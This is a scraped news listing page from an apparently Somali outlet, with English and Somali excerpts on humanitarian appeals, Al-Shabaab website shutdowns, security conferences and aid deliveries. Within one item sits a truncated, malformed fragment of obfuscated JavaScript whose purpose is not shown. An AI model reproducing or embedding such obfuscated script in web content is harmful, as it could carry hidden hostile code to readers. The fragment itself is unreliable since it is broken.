UN, Somalia launch $1.6 Billion appeal for humanitarian aid
MOGADISHU, SOMALIA — The United Nations and the Somali government have launched a $1.6 billion appeal to address humanitarian challenges in Somalia. The 2024 Humanitarian Needs Action Plan seeks to provide life-saving support to over 5 million Somalis this year.
The U.N. says climate shocks, conflict, widespread poverty and disease outbreaks continue to drive humanitarian needs in the Horn of...
Ciidamada Itoobiya oo dhaq-dhaqaaqyo ka bilaabay gobolka Hiiraan
BELEDWEYNE (SMN) - Wararka ka imaanaya gobolka Hiiraan ayaa sheegaya in maanta xaalad kacsanaan ah laga dareemayo deegaanka Halgan ee gobolkaasi, halkaas oo ay dhaq-dhaqaaqyo ka bilaabeen ciidamada Itoobiya ee ku sugan gobolka.
Ilo dadka deegaanka ayaa innoo sheegay inay arkayaan gaadiidka ciidamada oo isaga kala goosha deegaanka, taas oo keentay in dhaq-dhaqaaqyo laga dareemo halkaasi.
Wararka ayaa sheegaya in ciidamada...
Hay’adda NISA oo xirtay bogag ay lahaayeen Al-Shabaab
MUQDISHO (SMN) - Hay'adda Sirdoonka iyo Nabad Sugidda Qaranka ee NISA ayaa shaacisay in dalka iyo dibaddiisa ay ka xirtay Website-yo ay adeegsan jireen Al-Shabaab.
Qoraal kaso baxay NISA ayaa waxaa lagu sheegay inay hay'addu heshay magacyada miilkiilayaasha diiwaan-geliyay, kadibna laga dacweeyay dalalka ay joogaan:
Liiska Website-yada la xiray ka eeg sawirka hoose:-
function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return...
Somali president attends a crucial UAE meeting on his country’s security
ABU DHABI, UAE - The president of Somalia Hassan Sheikh attended a vital conference on his country's security which brought together representatives from several countries.
Delegates and top officials from Qatar, the UK, the US, UAE, and Turkey were in attendance at the Abu Dhabi forum that seeks united support for Somalia in terms of security.
"The meeting focused on how to...
Farmaajo set to return to Somalia after long absence
MOGADISHU, Somalia - The former president of Somalia Mohamed Abdullahi Farmaajo is expected to return to the country on Friday.
Multiple sources confirmed Farmaajo's comeback which from Doha, Qatar where he was staying since his defeat in May 2022 presidential election.
The sources add that the aim of Farmaajo's trip is based on mediation between Villa Somalia and Puntland leader Said...
Somalia: NISA shuts down Al-Shabaab-affiliated websites
MOGADISHU, Somalia - The Somali National Intelligence and Security Agency (NISA) has released the list of Al-Shabaab-affiliated websites that it blocked from the public domains.
The websites are the biggest ones where Al-Shabaab used to spread its news and could only be viewed abroad, as it has already been closed inside the country.
A statement issued by the NISA agency said...
WHO seeks more funds to curb Cholera outbreak in Somalia
MOGADISHU, Somalia -- The World Health Organization (WHO) on Thursday called for more funds to scale up response activities to contain a cholera outbreak in Somalia as the number of cases continues to rise.
The current cholera outbreak in Somalia is a continuation of the outbreak last year that spread to new districts affected by floods in October 2023, the...
Sawirro: Hay’adda SoDMA oo gargaar ku wareejisay maamulka gobolka Gedo
MUQDISHO (SMN) - Munaasabadd Kooban oo ka dhacday Baqaarka Hay’adda SoDMA, ayaa maanta Guddoomiyaha Hay'adda Maareynta Musiiboyinka Qaranka Md. Maxamuud Macallim Cabdulle waxa uu shixnad raashin iyo daawo iskugu jirta ku wareejiyey Guddoomiyaha Gobolka Gedo Cabdullaahi Shimbir iyo Masuuliyiin kale oo ka tirsan Maamulka Jubbaland.
Raashinkaan ayaa gaaraya 3,000 oo tan, sidoo kale waxaa wehliya shixnad daawo ah, waxaana hay'adda...
Madaxweyne Xasan oo shir ku saabsan amniga Somalia uga qayb-galay Dubai
DUBAI (SMN) - Madaxweynaha Jamhuuriyadda Federaalka Soomaaliya Xasan Sheekh Maxamuud ayaa dalka Isu-tagga Imaaraatka Carabta kaga qeyb galay Shirka ku saabsanaa Amniga Soomaaliya oo ay ka qeyb galeen dalalka sida dhow u taageera amniga dalka, kuwaas oo ay ka mid yihiin Imaaraadka Carabta, Qatar, Mareykanka, UK iyo Turkiga.
Shirka ayaa diiradda lagu saaray sidii dowladda Soomaaliya looga taageeri lahaa dagaalka...
Sawirro: Soomaaliya iyo Qatar oo kala saxiixday heshiis cusub + Ujeedka
DOOXA (SMN) - Heshiiskan ayaa waxa goobjoog ka ahaa safiirka Dowladda Qatar u joogo Soomaaliya, wafdi ka socday Wasaaradda Dhaqanka Dowlada Qatar, Wasiiru-Dowlaha Wasaaradda Waxbarashda, Xoghayaha joogtada ah, Guddoomiyeyaasha Maktabadda iyo Akeedimayada iyo Maauuliyiin kale.
Heshiiska ayaa waxuu ku saabsanaa sidii loo hormarin lahaa Maktabadda Qaranka iyo Guud ahaan maktabadaha Dalka, si kor loogu qaado akhriska, cilmibaarista iyo garaadka ubadka...












